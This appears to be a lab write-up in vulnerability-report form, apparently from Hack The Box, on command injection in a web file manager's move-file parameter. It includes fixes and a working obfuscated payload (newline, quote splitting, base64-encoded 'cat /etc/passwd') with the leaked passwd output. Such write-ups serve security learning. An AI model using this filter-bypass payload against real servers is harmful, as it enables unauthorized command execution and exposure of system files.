💉 Command Injection in Move File Function Allows Reading Server Files (HTB)

2025-05-07

OAuth2FAAuthentication

CWE:

CWE-77: Improper Neutralization of Special Elements used in a Command (Command Injection)
CWE-20: Improper Input Validation

CVSS (Estimated):

Base Score: 8.6 (High) Vector:

AV\:N/AC\:L/PR\:L/UI\:N/S\:U/C\:H/I\:L/A\:N

Overview:

A command injection vulnerability was discovered in the "Move File" functionality of the web application hosted at http://94.237.53.203:49711. This issue allows an authenticated normal user to execute arbitrary system commands by manipulating the to parameter in a GET request during the file move operation. By exploiting this, an attacker can read sensitive server files, including /etc/passwd, without needing elevated privileges.

Impact:

Command Execution: Enables arbitrary shell commands to be executed on the server.
Information Disclosure: Attackers can read sensitive system files, such as /etc/passwd.
Privilege Escalation Path: While the attacker initially has user-level access, the ability to read system files may aid in further exploitation.
Weak Authorization Controls: Demonstrates insufficient validation for user-supplied parameters, exposing server internals.

Fix:

Strictly validate all user input on server-side functions, particularly those interacting with the file system or shell commands.
Disallow special characters such as ;, |, &, and $ in parameters unless strictly necessary and safe.
Use parameterized or safe shell execution libraries (e.g., escapeshellarg() or equivalent functions).
Escape and sanitize all user input before embedding it in shell commands.
Implement logging and alerting for abnormal file access or command execution behavior.

Detailed Exploitation Steps:

1. Navigate to the Target Application:

Open your browser and go to: http://94.237.53.203:49711
Log in as a normal user (no admin privileges required).
You will be directed to a basic file manager interface, listing files that the user owns.

2. Identify the “Copy/Move” File Icon:

Next to each file, there's an icon that allows the user to copy or move that file to another location.
When clicked, this icon sends a GET request to the server with parameters including from, to, move, and finish.

3. Intercept the Request in Burp Suite:

Using Burp Suite, click the move icon and intercept the request.
The typical request looks like:

GET /index.php?to=&from=2561732172.txt&finish=1&move=1 HTTP/1.1  
Host: 94.237.53.203:49711

This indicates the server is performing a backend command like:

bash mv /var/www/html/files/2561732172.txt /var/www/html/files/{to}

4. Attempt Command Injection (Initial Test):

Modify the to parameter with a simple command injection payload:

to=;whoami

Result: Blocked – likely due to basic filtering or lack of newline/space injection.

5. Bypass Filters Using Encoded Payloads (Successful Exploitation):

Use newline and special character injection to bypass command filtering:

GET /index.php?to=%0Aba"s"h<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dk)&from=2561732172.txt&finish=1&move=1

Explanation of payload:
%0A is a newline character.
ba"s"h<<<... tricks the shell into parsing a new command.
$(base64 -d <<< ...) decodes the base64-encoded string:
- Y2F0IC9ldGMvcGFzc3dk = cat /etc/passwd
This ultimately executes:

cat /etc/passwd

6. Observe the Response – Sensitive Data Leaked:

The server response contains the following:

Error while moving: mv: '/var/www/html/files/2561732172.txt' and '/var/www/html/files/2561732172.txt' are the same file
<br>
root:x:0:0:root:/root:/bin/bash
<br>
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
<br>
bin:x:2:2:bin:/bin:/usr/sbin/nologin
<br>
...
<br>
mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false
<br>
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin

This confirms that arbitrary shell command execution is possible and that sensitive OS files can be accessed.

Conclusion:

This command injection vulnerability in the file manager's "move file" function poses a severe threat. It enables normal authenticated users to execute arbitrary shell commands through the to parameter, leading to unauthorized access to critical server files. Left unpatched, it exposes the system to further exploitation, data leaks, and potential privilege escalation.